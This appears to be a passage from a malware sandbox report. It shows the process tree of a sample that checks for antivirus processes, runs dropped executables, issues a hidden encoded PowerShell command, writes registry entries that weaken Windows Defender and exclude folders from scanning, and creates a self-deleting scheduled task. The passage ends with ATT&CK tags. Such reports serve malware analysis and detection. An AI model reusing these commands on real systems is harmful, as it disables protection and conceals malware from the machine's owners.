                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                1⤵
                                                                  PID:1708
                                                                  • C:\Windows\SysWOW64\tasklist.exe
                                                                    tasklist /FI "imagename eq BullGuardCore.exe"
                                                                    2⤵
                                                                    • Enumerates processes with tasklist
                                                                    PID:2272
                                                                  • C:\Windows\SysWOW64\find.exe
                                                                    find /I /N "bullguardcore.exe"
                                                                    2⤵
                                                                      PID:5188
                                                                    • C:\Windows\SysWOW64\tasklist.exe
                                                                      tasklist /FI "imagename eq PSUAService.exe"
                                                                      2⤵
                                                                      • Enumerates processes with tasklist
                                                                      PID:5600
                                                                    • C:\Windows\SysWOW64\find.exe
                                                                      find /I /N "psuaservice.exe"
                                                                      2⤵
                                                                        PID:5616
                                                                      • C:\Windows\SysWOW64\findstr.exe
                                                                        findstr /V /R "^wtwRMqjYMlcblhfrOaJNpOohYASICCRoGRaYHSofIqwzkvtDhVASceYjWNSjoDvlzhRaVdvWpzypNPwCvgcGwZMDTye$" Hai.xla
                                                                        2⤵
                                                                          PID:5836
                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sta.exe.pif
                                                                          Sta.exe.pif V
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Suspicious use of SetThreadContext
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          • Suspicious use of SendNotifyMessage
                                                                          PID:5988
                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sta.exe.pif
                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sta.exe.pif
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            PID:4932
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4932 -s 464
                                                                              4⤵
                                                                              • Program crash
                                                                              PID:5796
                                                                        • C:\Windows\SysWOW64\waitfor.exe
                                                                          waitfor /t 5 MsGxuGavEVaQbserVWhrA
                                                                          2⤵
                                                                            PID:6012
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3648 -ip 3648
                                                                          1⤵
                                                                            PID:4556
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 816
                                                                            1⤵
                                                                            • Program crash
                                                                            PID:2272
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3648 -ip 3648
                                                                            1⤵
                                                                              PID:1508
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 3648 -ip 3648
                                                                              1⤵
                                                                                PID:5236
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3648 -ip 3648
                                                                                1⤵
                                                                                  PID:5412
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3648 -ip 3648
                                                                                  1⤵
                                                                                    PID:5792
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                    1⤵
                                                                                      PID:5148
                                                                                      • C:\Windows\system32\gpupdate.exe
                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                        2⤵
                                                                                          PID:1432
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                        1⤵
                                                                                          PID:4532
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                          1⤵
                                                                                            PID:3932
                                                                                          • C:\Windows\system32\gpscript.exe
                                                                                            gpscript.exe /RefreshSystemParam
                                                                                            1⤵
                                                                                              PID:3600
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 4932 -ip 4932
                                                                                              1⤵
                                                                                                PID:5536
                                                                                              • C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\gPBpUuc.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\gPBpUuc.exe j6 /site_id 525403 /S
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                • Drops file in System32 directory
                                                                                                PID:5052
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                                                                                                  2⤵
                                                                                                  • Drops file in System32 directory
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:4600
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                    3⤵
                                                                                                      PID:4184
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                        4⤵
                                                                                                          PID:216
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                        3⤵
                                                                                                          PID:1552
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                          3⤵
                                                                                                            PID:1728
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                            3⤵
                                                                                                              PID:5304
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                              3⤵
                                                                                                                PID:2828
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                3⤵
                                                                                                                  PID:1444
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                  3⤵
                                                                                                                    PID:5948
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                    3⤵
                                                                                                                      PID:5848
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                      3⤵
                                                                                                                        PID:4572
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                        3⤵
                                                                                                                          PID:4432
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                          3⤵
                                                                                                                            PID:3648
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                            3⤵
                                                                                                                              PID:648
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                              3⤵
                                                                                                                                PID:6032
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                3⤵
                                                                                                                                  PID:6048
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                  3⤵
                                                                                                                                    PID:1044
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                    3⤵
                                                                                                                                      PID:6136
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                      3⤵
                                                                                                                                        PID:5184
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                        3⤵
                                                                                                                                          PID:1532
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                          3⤵
                                                                                                                                            PID:3132
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                            3⤵
                                                                                                                                              PID:5684
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                              3⤵
                                                                                                                                                PID:5332
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:5364
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                  3⤵
                                                                                                                                                    PID:2220
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                    3⤵
                                                                                                                                                      PID:4308
                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                    2⤵
                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                    PID:1092
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                      3⤵
                                                                                                                                                        PID:5016
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                          4⤵
                                                                                                                                                            PID:5176
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                          3⤵
                                                                                                                                                            PID:3192
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                            3⤵
                                                                                                                                                              PID:4676
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                              3⤵
                                                                                                                                                                PID:684
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:6016
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:4244
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iTBLcazoBHNRC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:1688
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iTBLcazoBHNRC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:1520
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rYNYBiCjmUUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:3200
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rYNYBiCjmUUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:4592
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hnkumIqTRwUxQLVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:3540
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hnkumIqTRwUxQLVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:2468
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:5300
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:5292
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RHdUtmclRPrQNqWD /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:5280
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RHdUtmclRPrQNqWD /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:4164
                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      schtasks /CREATE /TN "gOBrsOuQw" /SC once /ST 06:08:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                      PID:1436
                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      schtasks /run /I /tn "gOBrsOuQw"
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:5640
                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                        schtasks /DELETE /F /TN "gOBrsOuQw"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:1328
                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:2112
                                                                                                                                                                                          • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:5540
                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:3388
                                                                                                                                                                                            • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                              gpscript.exe /RefreshSystemParam
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:2504

                                                                                                                                                                                              Network

                                                                                                                                                                                              MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                              Execution

                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                              1
                                                                                                                                                                                              T1053

                                                                                                                                                                                              Persistence

                                                                                                                                                                                              Modify Existing Service

                                                                                                                                                                                              1
                                                                                                                                                                                              T1031

